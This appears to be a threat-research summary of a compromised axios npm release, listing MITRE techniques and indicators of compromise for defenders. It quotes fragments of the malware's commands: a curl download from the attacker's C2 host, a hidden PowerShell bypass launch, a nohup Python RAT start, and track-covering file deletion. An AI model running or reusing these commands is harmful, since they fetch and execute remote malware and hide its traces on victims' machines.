Threat Research

Compromised axios npm package delivers cross-platform RAT

DataDogHQ
Compromised axios npm package delivers cross-platform RAT
On March 31, 2026, an attacker hijacked an axios npm maintainer account and published malicious releases ([email protected] and 0.30.4) that added a typosquatted dependency plain-crypto-js which executed a cross-platform RAT during npm install. The compromise was active for about three hours before npm removed the packages; the RAT communicated with C2 sfrclak[.]com and delivered macOS, Windows, and Linux payloads (all containing bugs), while maintainers and npm revoked tokens and mitigations followed. #axios #plain-crypto-js

Keypoints

  • On 2026-03-31 an attacker published malicious [email protected] (tagged latest) and [email protected] after compromising a maintainer account, exposing users who installed without pinned versions.
  • The malicious releases added a typosquatted dependency [email protected] whose postinstall script downloaded and executed a platform-specific RAT from http://sfrclak[.]com:8000/6202033.
  • The attack window lasted roughly 00:21–03:25 UTC (≈3 hours) before npm replaced the malicious package and removed the compromised axios versions; axios has millions of weekly downloads and many dependents.
  • The RAT implemented a common HTTP POST C2 protocol (hardcoded IE8 UA), sent initial directory listings (FirstInfo), and supported commands like runscript and peinject; all variants contained bugs limiting functionality or persistence.
  • The attacker published directly from the compromised account (npm metadata shows missing trustedPublisher / OIDC), and maintainer account metadata showed the maintainer email changed to an attacker-controlled address.
  • Mitigations included npm token revocation, removal of compromised versions, maintainer deprecation workflow, and telemetry-based hunting queries for package/library installations and C2 indicators.

MITRE Techniques

  • [T1195 ] Supply Chain Compromise – The attacker hijacked a maintainer account and published malicious package versions to the npm registry (‘an attacker compromised the npm account of an axios maintainer and published two malicious patch releases: 1.14.1 and 0.30.4.’).
  • [T1078 ] Valid Accounts – The adversary used a compromised npm/GitHub maintainer account session to publish packages and delete issue reports (‘the 1.14.1 snapshot shows the attacker’s email address’ and ‘the attacker deleted them’).
  • [T1105 ] Ingress Tool Transfer – The postinstall script fetched stage-two payloads from a remote C2 and wrote them to disk for execution (‘curl -o /Library/Caches/com.apple.act.mond -d packages.npm.org/product0 -s http://sfrclak.com:8000/6202033’).
  • [T1059 ] Command and Scripting Interpreter – The attack used multiple scripting interpreters (Node.js postinstall, PowerShell, Python, AppleScript) to execute commands and payloads (‘postinstall’: ‘node setup.js’, PowerShell and Python download-and-execute snippets in setup.js’).
  • [T1059.001 ] PowerShell – Windows payload executed a downloaded PowerShell script with execution policy bypass and used PowerShell to collect info and establish persistence (‘%PROGRAMDATA%wt.exe -w hidden -ep bypass -file %TEMP%6202033.ps1’).
  • [T1059.006 ] Python – Linux payload was a Python RAT invoked via nohup and exhibited beaconing and FirstInfo exfiltration (‘nohup python3 /tmp/ld.py SCR_LINK > /dev/null 2>&1 &’).
  • [T1027 ] Obfuscated Files or Information – setup.js used layered string transformations (reverse, base64, XOR) to hide URLs and commands (‘_trans_2(“__gvEvKx”, “OrDeR_7077”)’ and deobfuscation functions).)
  • [T1547.001 ] Boot or Logon Autostart Execution: Registry Run Keys – The Windows PowerShell payload created a Run key and a system.bat to persist on user login (‘registers it under the MicrosoftUpdate Run key at HKCUSoftwareMicrosoftWindowsCurrentVersionRun’).
  • [T1070.004 ] Indicator Removal on Host: File Deletion – The installer removed traces of the postinstall hook and replaced package.json to cover tracks (‘fs.unlink(__filename); fs.unlink(“package.json”); fs.rename(“package.md”, “package.json”);’).
  • [T1071.001 ] Application Layer Protocol: Web Protocols – The RAT used HTTP POST to communicate with the C2 endpoint and transmit base64-encoded JSON with a hardcoded User-Agent (‘HTTP POST to sfrclak[.]com:8000/6202033 with base64-encoded JSON bodies and a hardcoded IE8 User-Agent string’).

Indicators of Compromise

  • [Domain ] C2 domain – sfrclak[.]com (registered 2026-03-30 via Namecheap)
  • [IPv4 ] C2 A record – 142.11.206.73 (A record for sfrclak[.]com)
  • [URL ] Stage-2 download and C2 endpoint – http://sfrclak[.]com:8000/6202033
  • [User-Agent ] Hardcoded RAT UA – ‘mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)’
  • [npm package ] Malicious packages and affected versions – [email protected], [email protected]; [email protected]
  • [File hash ] Platform payload hashes – macOS Mach-O: 92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a, Windows PowerShell: 617b67a8e1210e4fc87c92d1d1da45a2f311c08d26e89b12307cf583c900d101 (and 1 more hash)
  • [File path ] Notable dropped files/artifacts – /Library/Caches/com.apple.act.mond (macOS binary), %PROGRAMDATA%system.bat (Windows persistence), and /tmp/ld.py (Linux payload)
  • [Email ] Attacker/compromised maintainer emails – [email protected] (axios publisher snapshot), [email protected] (plain-crypto-js publisher reported by StepSecurity)
  • [Build artifacts ] Developer artifacts leaked in macOS binary – Xcode project name ‘macWebT’ and development path ‘/Users/mac/Desktop/Jain_DEV/client_mac/macWebT/’

Read more: https://securitylabs.datadoghq.com/articles/axios-npm-supply-chain-compromise/